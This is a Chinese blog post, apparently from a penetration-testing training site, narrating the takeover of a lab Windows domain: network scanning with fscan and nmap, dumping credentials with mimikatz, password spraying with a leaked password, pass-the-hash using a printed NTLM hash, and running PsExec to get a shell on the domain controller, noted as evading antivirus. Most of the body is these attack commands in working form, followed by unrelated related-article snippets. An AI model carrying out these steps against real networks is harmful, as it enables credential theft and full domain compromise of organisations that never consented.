内网渗透:拿下一台内网主机后如何继续攻击拿下域控主机

news2024/12/23 14:04:29

目录

#### 域的定义:将网络中的多台计算机在逻辑上组织到一起,进行集中管理。

域控攻击目标

1. 判断当前主机是否在域中

windows系统的三种登录方式

NTLM协议



从上篇文章拿下10.0.1.4这台服务器后,发展对内网进行攻击,打穿这个内网:

拿下这台电脑,最重要的也就是先信息收集:
先探测下内网主机,再探测下主机端口,这是最简单的方法。

先ipconfig查看下当前ip,是什么ip段

然后上传nmap或其他扫描工具(fscan):nmap 10.0.1.1/24 探测10.0.1.1 - 10.0.1.255
fscan.exe -h 10.0.1.1/24 (默认使用全部模块)fscan.exe -h 10.0.1.1/16 (B段扫描)

发现10.0.1.3、6、8这三台服务器主机存活
然后开始翻一翻本机里面的文件,看看有没有有用的东西:

比如这里有数据库的账号密码:
我们就可以连上数据库


内网很多情况是这样的,内网很多机器,但是管理员可能就是那么几个人,所以各个机器的用户账号密码相同的可能性极高,那么我们如果能获取本机所有用户的密码,就可以看到管理员原本设置的密码。

我们可以利用一个老师强力推荐的内网攻击工具:猕猴桃


privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码
log 日志会记录内容

需要用管理员身份运行:

响应结果也会在log保留:

这些东西都是这台服务器之前有人用过这些账号密码登陆过的,所以内网其他服务器很有可能也是用这些账户密码(人喜欢方便记忆)
密码喷洒攻击
针对另外三台主机:

使用的账号密码,可能是1.4中收集到的这些账号密码
于是可以对内网中的其他主机进行密码爆破
到这里时,最好把收集到的信息放到本地进行整理


【因为这远程连接老是掉,太痛苦了】
fscan也有漏扫的功能:例如这里检测到了MS17-010永恒之蓝
 

收集完信息后,就准备进行域渗透了:

#### 域的定义:将网络中的多台计算机在逻辑上组织到一起,进行集中管理。

域的模型:
​ 域管理员 和 普通用户 =》 域控主机 普通主机

域控攻击目标

拿下域控主机和管理员账号
拿下域控之后,就等于控制了所有加入该域的主机。

接下来我们就去进行对域的渗透攻击:

1. 判断当前主机是否在域中

ipconfig /all:
 

这里如果dns后缀有域名,一般就是在域里,如果没有,一般也没在域里
systeminfo:

域这里有域的信息,workgroup代表工作组,也就是没有在任何域里
net time /domain (需要你有域用户登录主机)

这种情况就说明没有在域里

这台主机不在域中,就需要利用我们信息收集的其他存活主机,利用猕猴桃:
privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码
然后进行密码喷洒攻击【不需要任何协议,利用心理】去登录其他内网存活主机

这里对10.0.1.8的mstsc:
Administrator woshifengge1.
登录成功

对它继续按照之前的方法信息收集:


看到它在zkaq.cn域,我们这时登录的是本地用户Administrator【线上用户应为zkaq.cn\Administrator】
试试切换为线上用户-》这时woshifengge1.的密码就失败了


我们只能换个方式,去查找域控主机:
=》查找内网的dns服务器,从而确定域控主机
nslookup zkaq.cn
ping zkaq.cn

发现回应的都是 10.0.1.6 ,说明它很有可能就是域控主机的ip【只通过ping还不确定,因为可能域控不是直接使用zkaq.cn,可能是使用子域名。但是nslookup 通常由域控主机ip回应】
可使用查看域控制器的机器名
nltest /DCLIST:域名:
 

DC.zkaq.cn,这样得到的主机一般都是域控主机

再确认一下,10.0.1.6就是我们的域控主机了;
接下来我们就是对域控主机发动攻击:
通过检查域控主机是否存在可利用的漏洞,如果存在可以利用的漏洞,直接对漏洞发动攻击,拿下目标服务器。
还是先对1.8用猕猴桃信息收集一波密码【猕猴桃 抓取 10.0.1.8主机的历史登录记录,可能能获得域用户名和密码。】:
privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码


但是win server 2008 之后的版本,系统不在明文存储密码,存放的是加密后的数据
NTLM : 61465a991b168727b65b3644aab823cd
SHA1 : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
hash理论上不能被破解,但是可以通过类似MD5解密的爆破手法破解
若破解不成功,只能另取它法:

windows系统的三种登录方式
  1. 本地登录

  2. 远程登录 (rdp)

    使用 明文的用户名和密码进行登录的。

  3. 网络登录

    登录记录,凭证【登录后的特征数据,来去进行身份校验】:
    NTLM 协议认证
    kerberos 协议认证

NTLM协议

哈希传递 的方式实现一个攻击

​ 攻击原理: 认证过程中有一个缺陷,可以让我们直接传递密文的hash值,和存储在数据库中的hash值进行比对

1. 用户提供账号密码
1. windows接收到账号密码之后 = > 对密码进行NTLM哈希计算 
1. 将加密后的数据 和 电脑中保存的数据进行比较

哈希传递 : 跳过前两步,直接通过 提供加密后的 hash值,让电脑进行比较
我们同样是通过猕猴桃进行哈希传递:
通过得到的NTLM : 61465a991b168727b65b3644aab823cd 明文密码加密后的哈希值
username:administrator
然后执行猕猴桃指令:
privilege::debug 提升权限
sekurlsa::pth /user:administrator /domain:”zkaq.cn” /ntlm:61465a991b168727b65b3644aab823cd
【登陆用户+域地址+ntlm加密值】

我们就登陆到了1.8域zkaq.cn的线上用户:zkaq.cn\administrator
验证:
net time/domain


这是域用户才可以执行的指令

这里就可以看出差异;
通过域用户cmd执行:
dir \DC.zkaq.cn\c$:查看域服务器的目录:

可以查看到C盘就代表着,你有了操作域控的权限


但我此时还只是个成员服务器,我还更想贪心变成域控服务器为所欲为:
这里用一个Windows官方出的工具。[PsExec.exe] 因为官方,所以自带免杀
PsExec.exe \dc.zkaq.cn cmd [他会去调用域控主机的cmd]


我们就拿下了域控服务器



没看够~?欢迎关注!

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1326679.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[SWPUCTF 2021 新生赛]easy_md5

打开环境 这儿考弱比较,之前的WP里写过绕过方法,这儿我们直接数组绕过 构造GET传参name[]123 , POST传参password[]456得到flag

在区块链中看CHAT的独特见解

问CHAT:谈谈对区块链以及区块链金融的理解 CHAT回复:区块链是一种去中心化的分布式数据库技术,这种技术通过加密算法,使数据在网络中传输和存储的过程变得更加安全可靠。区块链的出现引领了存储、交易等形式的革命,改变…

SSH无密登陆配置

1 SSH介绍 ssh命令用于远程登录到其他计算机,实现安全的远程管理。 基本语法: ssh 域名/IP地址 示例: (1)从hadoop100服务器上远程连接hadoop101服务器 [hadoophadoop100 ~]$ ssh hadoop101 如果出现如下内容 Ar…

【科技前沿】数字孪生技术改革智慧供热,换热站3D可视化引领未来

换热站作为供热系统不可或缺的一部分,其能源消耗对城市环保至关重要。在双碳目标下,供热企业可通过搭建智慧供热系统,实现供热方式的低碳、高效、智能化,从而减少碳排放和能源浪费。通过应用物联网、大数据等高新技术,…

Mac如何搭建本地服务器

苹果电脑Mac OS X系统自带了Apache服务器 打开终端 //开启apache:sudo apachectl start //重启apache:sudo apachectl restart //关闭apache:sudo apachectl stop在浏览器输入127.0.10.1 , 如果页面出现 it works,则…

数据可视化分析大屏,大数据统计UI页面源文件(信息分析平台免费PS资料)

数据可视化可以帮助数据分析者更好地理解数据,发现数据中的规律和趋势。通过图表和图形等可视化工具,数据分析者可以更快速地发现数据中的关系,比如相关性、趋势、异常值等。对于普通用户来说,理解复杂的数据可能会很困难。通过数…

11 Vue3中v-bind绑定动态样式和动态样式类

概述 v-bind指令可以说是Vue3中最常用的指令之一,使用v-bind,我们几乎能够给任何实现动态的绑定比值。 这里,我们主要演示以下,通过v-bind动态绑定CSS样式。 基本用法 我们创建src/components/Demo11.vue,在这个组…

Android App程序应用未校验签名证书——————《风险等级高》

目录 应用签名未校验风险1、检测目的2、风险等级3、检测依据4、风险描述5、检测步骤6、结果描述7、解决方案7.1、Android 检验 APK 是否签名的代码7.2、检验APK签名 8、结尾 应用签名未校验风险 1、检测目的 检测App程序启动时是否校验签名证书。 防止App的盗版率。未进行签…

vscode打开多个标签页配置

前言 如果其中一个标签的文件没有修改,再打开一个文件时之前的打开的标签页就会被替换掉。 在工作中使用很不方便。 解决办法 文件-首选项--设置 下图取消勾选 取消之后如下 再去打开标签就会一致显示了

14:00面试,14:08就出来了,问的问题有点变态。。。

从小厂出来,没想到在另一家公司又寄了。 到这家公司开始上班,加班是每天必不可少的,看在钱给的比较多的份上,就不太计较了。没想到5月一纸通知,所有人不准加班,加班费不仅没有了,薪资还要降40%…

C++ Qt开发:StringListModel字符串列表映射组件

Qt 是一个跨平台C图形界面开发库,利用Qt可以快速开发跨平台窗体应用程序,在Qt中我们可以通过拖拽的方式将不同组件放到指定的位置,实现图形化开发极大的方便了开发效率,本章将重点介绍QStringListModel字符串映射组件的常用方法及…

【QT Visual Studio环境配置】error MSB8020: 无法找到 v141/v142 的生成工具(完整版)

首先要了解V**平台工具集根据你安装的Visual Studio版本不同而有所区别,知道这个就容易解决问题了,确定你安装的那个版本,需要使用哪个工具集。 v143–>VS2022v142–>VS2019v141–>VS2017v140–>VS2015v120–>VS2013 一、解决…

【网络编程】poll和epoll服务器的设计

文章目录 前言一、poll二、epoll 1.epoll初识2.epoll服务器的设计3.epoll的工作原理4.epoll的优点5.epoll的工作模式总结 前言 poll和select一样,也是一种linux中的多路转接的方案。而poll解决了select的两个问题: 1.select的文件描述符有上限的问题。…

05鸿蒙APP开发之加载网络列表

目录 1、概述2、http请求封装2.1、为什么要封装Http请求?2.2、封装后的网络请求 3、发起请求并渲染列表数据第一步:准备一个目前能用的,测试API地址,如下:第二步:创建对应的实体对象第三步:调用…

10 Vue3中v-html指令的用法

概述 v-html主要是用来渲染富文本内容,比如评论信息,新闻信息,文章信息等。 v-html是一个特别不安全的指令,因为它会将文本以HTML的显示进行渲染,一旦文本里面包含一些恶意的js代码,可能会导致整个网页发…

对大学生创新创业某赛事目前存在的烂尾楼现象的一些研究的分享(1)

经过对”某某网”大学生创新创业大赛国赛第五届-第八届部分金奖项目的研究,进行较为充分的信息溯源、穿透调查,我发现不少项目存在赛事材料画大饼,严重不切合实际,参赛人员并非真正创新创业,赛后迅速销声匿迹、烂尾切割…

2023年全球架构师峰会(ArchSummit北京站2023)-核心PPT资料下载

一、峰会简介 ArchSummit聚焦业界强大的技术成果,秉承“实践第一、案例为主”的原则,展示先进技术在行业中的典型实践,以及技术在企业转型、发展中的推动作用。旨在帮助技术管理者、CTO、架构师做好技术选型、技术团队组建与管理&#xff0c…

机器学习——分类评价指标

【说明】文章内容来自《机器学习——基于sklearn》,用于学习记录。若有争议联系删除。 1、评价指标 对于模型的评价往往会使用损失函数和评价指标,两者的本质是一致的。一般情况下,损失函数应用于训练过程,而评价指标应用于测试过…

Apache Superset如何实现无公网ip实时远程访问本地数据【内网穿透】

文章目录 前言1. 使用Docker部署Apache Superset1.1 第一步安装docker 、docker compose1.2 克隆superset代码到本地并使用docker compose启动 2. 安装cpolar内网穿透,实现公网访问3. 设置固定连接公网地址 前言 Superset是一款由中国知名科技公司开源的“现代化的…